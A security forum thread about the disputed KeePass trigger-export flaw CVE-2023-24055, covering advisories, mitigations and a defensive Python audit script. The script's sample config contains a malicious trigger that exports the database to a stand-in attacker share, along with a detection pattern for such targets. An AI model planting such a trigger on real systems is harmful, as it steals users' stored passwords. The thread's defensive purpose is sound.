NCSC warns of Vulnerability in Password Manager KeePass

Gandalf_The_Grey (thread author)
Dutch article translated by DeepL:
The Ministry of Justice and Security's National Cyber Security Center (NCSC) is warning of a vulnerability in password manager KeePass that would allow an attacker who already has access to a system to obtain data in the KeePass database, such as passwords. The developer states that this is not a vulnerability and KeePass' password database is not designed to protect against an attacker with such access to the system. Accordingly, no security update will be released.

A proof-of-concept exploit that allows a local attacker to obtain the contents of the KeePass database has appeared online. The security flaw is caused by KeePass' configuration being stored unencrypted. A local attacker can modify this configuration and add a rogue export rule. When a user opens a KeePass database, the export rule causes stored data to be exported to the attacker undetected.

According to the NCSC, system administrators can still prevent abuse through an Enforced Configuration. "Setting the ExportNoKey parameter to false ensures that a master password is required for exporting stored data. This prevents a malicious party from surreptitiously exporting sensitive data," the NCSC said.

The government agency advises organizations to use an Enforced Configuration and implement at least the above configuration. In addition, organizations are advised to perform risk assessment before using KeePass. The vulnerability in KeePass is designated as CVE-2023-24055, but has been disputed by the developer.
 

Azure
That has been something I have been wondering about, since quite a few people have decided to quit using cloud password managers. Couldn't a hacker just target their local password manager?

And sure, this article states that this vulnerability requires a local hacker. But isn't that how a lot of things start? With small, often overlooked steps.
Who's to say what will happen in a couple of months, and whether that might no longer be a requirement.
 

ScandinavianFish
When LastPass was hacked, people were suggesting not going for a cloud password manager like Bitwarden but using the most secure offline password manager, like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:

WhiteMouse
ScandinavianFish said:
When LastPass was hacked, people were suggesting not going for a cloud password manager like Bitwarden but using the most secure offline password manager, like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:

Jokes aside, I don't care that product X has a vulnerability; it happens to every piece of software. The only thing that's important is how the company deals with it.
 

Azure
ScandinavianFish said:
When LastPass was hacked, people were suggesting not going for a cloud password manager like Bitwarden but using the most secure offline password manager, like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:

For KeePass, what the article says seems like an option:

According to the NCSC, system administrators can still prevent abuse through an Enforced Configuration. "Setting the ExportNoKey parameter to false ensures that a master password is required for exporting stored data. This prevents a malicious party from surreptitiously exporting sensitive data," the NCSC said.

For Bitwarden, make sure you have a strong master password.
 

Andrezj
This method does not require physical access.
By "access" they mean the attacker has gained network access to the system, such as a remote agent running on the system, or a local attacker who has gained access remotely while being behind the router on the LAN.
Now threat actors can programmatically perform the attack and incorporate it into an infostealer that will send the password export file to a remote destination.

The "PoC" was done by a local hacker, but that does not preclude the same PoC being performed by a remote attacker.

The notification is not accurately written; all an attacker needs is write access to the KeePass configuration file. That can be any attacker with the required permissions, local or remote.
 

Gandalf_The_Grey
WARNING - AN ATTACKER WHO HAS WRITE ACCESS TO THE KEEPASS CONFIGURATION FILE CAN MODIFY IT AND INJECT MALICIOUS TRIGGERS

Sources

Keepass - Security Issues - KeePass

Risks

An attacker who has write access to the KeePass configuration file can modify it and inject malicious triggers, e.g. to obtain the cleartext passwords by adding an export trigger.

Description

KeePass features an event-condition-action trigger system. With this system workflows can be automated. An attacker could abuse this feature by injecting malicious triggers in the KeePass configuration file.
The Keepass knowledge base article regarding security issues indicates having write access to the KeePass configuration file typically implies that an attacker can actually perform much more powerful attacks than modifying the configuration file (and these attacks in the end can also affect KeePass, independent of a configuration file protection).
These attacks can only be prevented by keeping the environment secure by using an anti-virus software, a firewall, not opening unknown e-mail attachments, etc. Therefore, no patch will be provided.
Other projects supporting KeePass databases, such as KeePassXC, do not share code with KeePass. In addition, these do not implement a trigger system and are consequently not vulnerable to this attack vector.

Recommended Actions

Since no patch will be made available, the CCB suggests implementing a mitigation via the enforced configuration feature. This feature is intended primarily for network administrators who want to enforce certain settings for users of a KeePass installation, but it can also be used by end users to harden their KeePass setup. Please note that this hardening only makes sense if this file cannot be modified by the end user.

Settings in the enforced configuration file KeePass.config.enforced.xml take precedence over settings in global and local configuration files. Various options to harden your KeePass setup are documented in the GitHub Keepass-Enhanced-Security-Configuration repository listed in the reference section. It is for example possible to fully disable the trigger feature (XPath Configuration/Application/TriggerSystem).

Organizations might also consider moving to an alternative password manager with support for KeePass password vaults.

References

Vendor mailing list - KeePass / Discussion / Open Discussion: someone can read the passwords using export trigger

Vendor knowledge base - Enforced Configuration - KeePass

Vulnerability disclosure - GitHub - alt3kx/CVE-2023-24055_PoC: CVE-2023-24055 PoC (KeePass 2.5x)

KeePass hardening guide - GitHub - onSec-fr/Keepass-Enhanced-Security-Configuration: Make your keepass more secure.
 

plat

If the user has installed KeePass as a regular program and the attackers have write access, they can also "perform various kinds of attacks." Threat actors can also replace the KeePass executable with malware if the user runs the portable version.

"In both cases, having write access to the KeePass configuration file typically implies that an attacker can actually perform much more powerful attacks than modifying the configuration file (and these attacks in the end can also affect KeePass, independent of a configuration file protection)," the KeePass developers explain.

"These attacks can only be prevented by keeping the environment secure (by using an anti-virus software, a firewall, not opening unknown e-mail attachments, etc.). KeePass cannot magically run securely in an insecure environment."

However, even though the KeePass developers will not provide users with a version of the app that addresses the export-to-cleartext-via-triggers issue, you could still secure your database by logging in as a system admin and creating an enforced configuration file.
 

Gandalf_The_Grey
Before using an enforced config file, you must also ensure that regular system users do not have write access to any files/folders in KeePass' app directory.

And there's also one more thing that could allow attackers to work around enforced configurations: using a KeePass executable launched from another folder than the one where your enforced config file was saved.

"Please note that an enforced configuration file only applies to the KeePass program in the same directory," the KeePass development team says,

"If the user runs another copy of KeePass without an enforced configuration file, this copy does not know the enforced configuration file that is stored elsewhere, i.e. no settings are enforced."
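The following is an added example (my own code, not code from KeePass, the NCSC, the CCB or the onSec-fr hardening repository) that covers both the CCB's recommended action above and the placement caveat in the post just above: it parses a KeePass.config.xml and reports every trigger with its action parameters, emits a KeePass.config.enforced.xml that disables the trigger system and sets ExportNoKey to false, and checks that the enforced file carries the right name and sits in the same directory as the KeePass executable. Assumptions not confirmed by anything in this thread: the element layout of triggers under Configuration/Application/TriggerSystem (Triggers/Trigger/Name, Actions/Action/TypeGuid, Parameters/Parameter), that an Enabled element set to false under that node is how the trigger feature is switched off, and that ExportNoKey lives under Configuration/Defaults. KeePass's action type GUIDs are not known here and are deliberately not hard-coded, so a heuristic flags parameters that look like an export target instead. The sample configuration is constructed, with dummy GUID values.

```python
# Added example for this thread: audit a KeePass 2.x config for injected
# triggers, build the recommended enforced config, and check its placement.
import os
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample KeePass.config.xml: an attacker with write access added a
# trigger that exports the opened database to a UNC share. GUID values are dummy
# placeholders; the element layout is an assumption modelled on KeePass's trigger XML.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Name>export</Name>
          <Events>
            <Event><TypeGuid>BBBBBBBBBBBBBBBBBBBBBB==</TypeGuid></Event>
          </Events>
          <Actions>
            <Action>
              <TypeGuid>CCCCCCCCCCCCCCCCCCCCCC==</TypeGuid>
              <Parameters>
                <Parameter>\\attacker\share\{DB_BASENAME}.xml</Parameter>
                <Parameter>KeePass XML (2.x)</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

# Action type GUIDs are not hard-coded (unknown here); every trigger is reported and
# parameters that look like an export target (UNC path, drive path, URL, export
# format name, KeePass database placeholder) are flagged.
EXPORT_HINT = re.compile(r"(^\\\\|^[A-Za-z]:\\|://|KeePass XML|CSV|HTML|\{DB_)", re.I)


def audit_triggers(config_xml: str) -> dict:
    """Return the trigger-system state and every trigger with its action parameters."""
    root = ET.fromstring(config_xml)
    ts = root.find("./Application/TriggerSystem")
    # A missing <Enabled> is treated as enabled, KeePass's default (assumption).
    enabled_text = ts.findtext("Enabled") if ts is not None else None
    enabled = (enabled_text or "true").strip().lower() == "true"
    triggers = []
    for trig in root.iterfind("./Application/TriggerSystem/Triggers/Trigger"):
        actions = []
        for act in trig.iterfind("./Actions/Action"):
            params = [p.text or "" for p in act.iterfind("./Parameters/Parameter")]
            actions.append({"type_guid": act.findtext("TypeGuid") or "",
                            "parameters": params,
                            "suspicious": any(EXPORT_HINT.search(p) for p in params)})
        triggers.append({"name": trig.findtext("Name") or "", "actions": actions})
    return {"trigger_system_enabled": enabled, "triggers": triggers}


def build_enforced_config() -> str:
    """KeePass.config.enforced.xml that turns the trigger system off and requires the
    master key for exports. Settings present here take precedence over the global and
    local config files. ExportNoKey under <Defaults> is an assumption."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            '<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
            '               xmlns:xsd="http://www.w3.org/2001/XMLSchema">\n'
            '  <Application>\n'
            '    <TriggerSystem>\n'
            '      <Enabled>false</Enabled>\n'
            '    </TriggerSystem>\n'
            '  </Application>\n'
            '  <Defaults>\n'
            '    <ExportNoKey>false</ExportNoKey>\n'
            '  </Defaults>\n'
            '</Configuration>\n')


def check_enforced_placement(keepass_exe: str, enforced_file: str) -> dict:
    """The enforced file only applies to the KeePass executable in the same directory,
    must carry the exact file name, and is pointless if ordinary users can write to it
    or to the program directory."""
    exe, enf = Path(keepass_exe), Path(enforced_file)
    same_dir = exe.parent.resolve() == enf.parent.resolve()
    correct_name = enf.name.lower() == "keepass.config.enforced.xml"
    # os.access is a coarse, current-user-only check; on Windows read the ACLs
    # (icacls / Get-Acl) to confirm regular users have no write access.
    return {"placement_ok": same_dir and correct_name,
            "enforced_file_writable": enf.exists() and os.access(enf, os.W_OK),
            "app_dir_writable": exe.parent.exists() and os.access(exe.parent, os.W_OK)}


if __name__ == "__main__":
    report = audit_triggers(SAMPLE_CONFIG)
    print("trigger system enabled:", report["trigger_system_enabled"])
    for t in report["triggers"]:
        for a in t["actions"]:
            print(f"trigger {t['name']!r}:", "SUSPICIOUS" if a["suspicious"] else "ok", a["parameters"])
    print(build_enforced_config())
    print(check_enforced_placement("/opt/KeePass/KeePass.exe", "/opt/KeePass/KeePass.config.enforced.xml"))
```

Run it against the real KeePass.config.xml (global copy in the program directory or the per-user copy under %APPDATA%\KeePass) rather than the constructed sample; any trigger whose action parameters point at a path, share or URL deserves a look, and the enforced file only helps if it lives next to the KeePass.exe the user actually launches and is not writable by that user.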
 

silversurfer
I recently switched to KeePassXC, which has better support across other OSes like Android, iOS and Linux. The self-developed KeePassXC browser extension is another advantage.

This article (posted/shared by @Gandalf_The_Grey) notes that KeePassXC does not have the same issues: "not vulnerable to this attack vector."

Edit: Confirmed by a member from developer team of KeePassXC:
KeePassXC is not affected, because it doesn't support triggers.
 

Gandalf_The_Grey
KeePass Password Manager vulnerability: what you need to know
Closing Words

Keeping a computer system secure is of paramount importance. Attackers who gain access to a system have lots of options at their disposal regarding data theft and other malicious activities. Still, triggers make the exporting of entire password databases simple.
 

Gandalf_The_Grey
KeePass 2.53.1 password manager resolves vulnerability controversy
KeePass users may want to upgrade to version 2.53.1 immediately to protect their passwords against automated exports.

Users may also want to check a KeePass security setting to make sure that the database is properly protected against brute force attacks.
 
